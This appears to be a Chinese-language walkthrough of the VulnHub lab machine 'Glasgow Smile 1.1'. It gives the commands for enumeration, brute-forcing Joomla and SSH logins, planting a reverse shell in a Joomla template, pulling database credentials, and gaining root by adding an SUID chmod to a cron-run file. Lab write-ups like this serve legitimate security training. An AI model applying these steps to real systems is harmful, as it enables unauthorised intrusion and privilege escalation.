OSCP难度靶机之Glasgow Smile:1.1

虚拟机下载地址：https://www.vulnhub.com/entry/glasgow-smile-11,491/
虚拟机简介：Glasgow Smile应该是 OSCP 机器的一种健身房
目标：4个flag
级别：中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.147

查看开放22、80端口

2、渗透测试

2.1 WEB渗透

访问站点首页显示一个小丑微笑界面

通过dirb进行目录扫描，发现存在joomla目录

dirb http://192.168.207.147

访问站点显示CMS为joomla

使用joomscan进行扫描测试，检测版本为3.7.3rc1

joomscan --url http://192.168.207.147/joomla/

使用cewl创建密码字典

cewl -m 5 http://192.168.207.147/joomla/ > pass.txt

使用burpsuite进行密码爆破，获取到账号为joomla，密码为Gotham

通过获取到的账号和密码登录成功，选择扩展---模板

选择模板并把反弹shell填写到index.php中，并选择保存

在扩展中选择模板，设置修改的模板为默认

开启NC监听，并访问joomla首页，获取到反弹shell

nc -lnvp 4444

2.2 主机渗透

初始化TTY配置

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

根据joomla配置文件信息，获取到数据库账号和密码

cd /var/www/html/joomla
cat configuration.php

登录数据库，查看数据库账号信息

mysql -u joomla -p
use batjoke;
select * from taskforce;

保存密码内容并进行base64解码

for line in $(cat test); do echo $line | base64 -d ; echo "" ; done

保存账号和解码后的密码通过hardy进行爆破到SSH账号和密码

hydra ssh://192.168.207.147 -L user.txt -P pass.txt

通过爆破出来的账号和密码成功登录到主机

ssh [email protected]

查看user.txt中获取到第一个FLAG

cat user.txt

查看Abnerineedyourhelp文件

cat Abnerineedyourhelp

通过CyberChef基于ROT13进行在线解密获取到账号和密码

通过base64进行解码获取到密码

echo STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA== | base64 -d

使用账号Abner和获取到的密码进行登录,获取到第二个FLAG

su - abner
cat user2.txt

查看用户的历史命令，查看有一个压缩包文件

history

查找压缩包文件，并复制到/tmp目录中进行解压

find / -print 2>/dev/null | grep -i ".dear_penguins.zip"

cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip /tmp
unzip .dear_penguins.zip

解压密码为abner账号的登录密码，I33hope99my0death000makes44more8cents00than0my0life0

查看解压后的提示信息,提示账号和密码信息

cat dear_penguins

使用账号和密码切换到penguin，在本地目录中获取到第三个FLAG

su - penguin
cd SomeoneWhoHidesBehindAMask
cat user3.txt

查看本地提示信息，说是正在开发一个以root身份启动的程序，开发完毕后会放在当前目录中

cat PeopleAreStartingToNotice.txt

查看本地目录中有一个隐藏文件.trash_old

通过pspy64进行监听发现该文件有定时任务

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod 777 pspy64
./pspy64

修改文件内容并添加二进制文件suid权限

nano .trash_old

添加如下内容：
chmod u+s /usr/bin/bash

等待一会儿后查看已经添加suid权限

ls -lah /usr/bin/bash
bash -p

查看FLAG信息

cd /root
cat root.txt

原文始发于微信公众号（安全孺子牛）：OSCP难度靶机之Glasgow Smile:1.1